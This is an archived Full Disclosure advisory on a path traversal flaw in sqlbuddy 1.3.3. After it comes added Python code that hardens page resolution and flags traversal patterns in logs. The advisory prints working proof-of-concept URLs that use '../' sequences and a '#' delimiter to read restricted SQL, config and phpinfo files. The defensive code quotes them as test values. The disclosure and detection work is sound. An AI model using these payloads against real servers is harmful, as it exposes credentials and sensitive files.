Full Disclosure mailing list archives

Sqlbuddy Path Traversal Vulnerability

From: John Page <hyp3rlinx () gmail com>
Date: Sat, 9 May 2015 18:57:42 -0400

Read arbitrary server files:

Affected Vendor: www.sqlbuddy.com
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source: http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt
Product: sqlbuddy version 1.3.3

SQL Buddy is an open source web based MySQL administration application.

Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about directories and read any PHP and non-PHP files by appending the '#' hash character when requesting files via URLs, e.g. .doc, .txt, .xml, .conf, .sql etc.

After adding the '#' character as a delimiter any non-PHP file will be returned and rendered by subverting the .php concatenation used by sqlbuddy when requesting PHP pages via POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>

POC exploits:
=======================
1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo

Disclosure Timeline:
==================================
Vendor Notification N/A
May 9, 2015: Public Disclosure - hyp3rlinx

Exploitation Technique:
=======================
Create a test file with non .php extension in some htdocs directory then request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#

Severity Level:
===============
High

Description:
==========================
Request Method(s): [+] POST
Vulnerable Product: [+] sqlbuddy 1.3.3
Vulnerable Parameter(s): [+] #page=[somefile]
Affected Area(s): [+] Server directories & sensitive files
===============================
(hyp3rlinx)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
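The defect the advisory describes is a page name taken from the client, joined to a directory and suffixed with ".php", where a delimiter in the value lets the traversal and the dropped extension through. The following is an added illustration, written for this archive page and not code from the advisory or from sqlbuddy, of how a page parameter should be resolved and how the advisory's own values look to a log check. The `resolve_page` and `is_suspicious` helpers, the temporary directory layout and the sample page values are all constructed for the example; it assumes the page name reaches the server as the POST parameter the advisory names.

```python
"""Hardened resolution of a user-supplied page name plus a simple detector.

Added illustration, not sqlbuddy's code. The directory layout, page names
and the resolve_page/is_suspicious helpers are constructed for this example.
"""
import os
import re
import tempfile
from typing import Optional
from urllib.parse import unquote

# Allowlist for page names: letters, digits and underscore only, so '/', '.',
# '#' and NUL never reach the filesystem call.
PAGE_NAME_RE = re.compile(r"^[A-Za-z0-9_]+$")

# Patterns worth flagging in a request log: traversal sequences, the '#'
# delimiter the advisory describes, NUL bytes, and absolute paths.
SUSPICIOUS_RE = re.compile(r"\.\.[/\\]|[#\x00]|^[/\\]")


def resolve_page(pages_dir: str, page: str) -> Optional[str]:
    """Map a page name to a .php file inside pages_dir, or return None.

    Two independent checks: the allowlist on the raw name, and a realpath
    containment check on the final path. Appending '.php' ourselves means a
    request for 'user_pwd.sql' can never drop the extension, whatever suffix
    the client adds.
    """
    if not PAGE_NAME_RE.fullmatch(page):
        return None
    root = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(root, page + ".php"))
    # Reject anything that resolved outside the pages directory (symlinks included).
    if os.path.commonpath([root, candidate]) != root:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def is_suspicious(page_value: str) -> bool:
    """Flag a logged 'page' parameter value carrying traversal or the '#' trick.

    The value is URL-decoded once first so '%2e%2e%2f' is caught as well.
    """
    decoded = unquote(page_value)
    return SUSPICIOUS_RE.search(decoded) is not None


def build_demo_tree() -> str:
    """Create a constructed htdocs-style layout in a temp dir:
    pages/home.php (legitimate target) and restricted/user_pwd.sql
    (the kind of file the advisory's first PoC reads)."""
    root = tempfile.mkdtemp(prefix="page_resolver_demo_")
    os.makedirs(os.path.join(root, "pages"))
    os.makedirs(os.path.join(root, "restricted"))
    with open(os.path.join(root, "pages", "home.php"), "w") as fh:
        fh.write("<?php echo 'home'; ?>\n")
    with open(os.path.join(root, "restricted", "user_pwd.sql"), "w") as fh:
        fh.write("-- constructed sample file, no real data\n")
    return root


def demo() -> dict:
    """Run the advisory's page values through both checks and return the results."""
    root = build_demo_tree()
    pages = os.path.join(root, "pages")
    attempts = [
        "home",                                  # legitimate request
        "../../../restricted/user_pwd.sql#",     # PoC 1 from the advisory
        "../../../../xampp/phpinfo",             # PoC 3 (a real .php target)
        "../restricted/user_pwd.sql",            # same file, shortest traversal
        "home#",                                 # '#' delimiter alone
    ]
    return {
        "resolved": {a: resolve_page(pages, a) for a in attempts},
        "flagged": {a: is_suspicious(a) for a in attempts},
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name)
        for key, val in value.items():
            print(f"  {key!r}: {val}")
```

Only the plain name "home" resolves; every value with a traversal sequence or a '#' is refused by the allowlist before any path is built, and the realpath containment check would still stop a symlink inside the pages directory that points elsewhere. The detector is deliberately broad (any "..", "#", NUL or leading slash in the decoded value) because a page parameter has no legitimate reason to carry those characters.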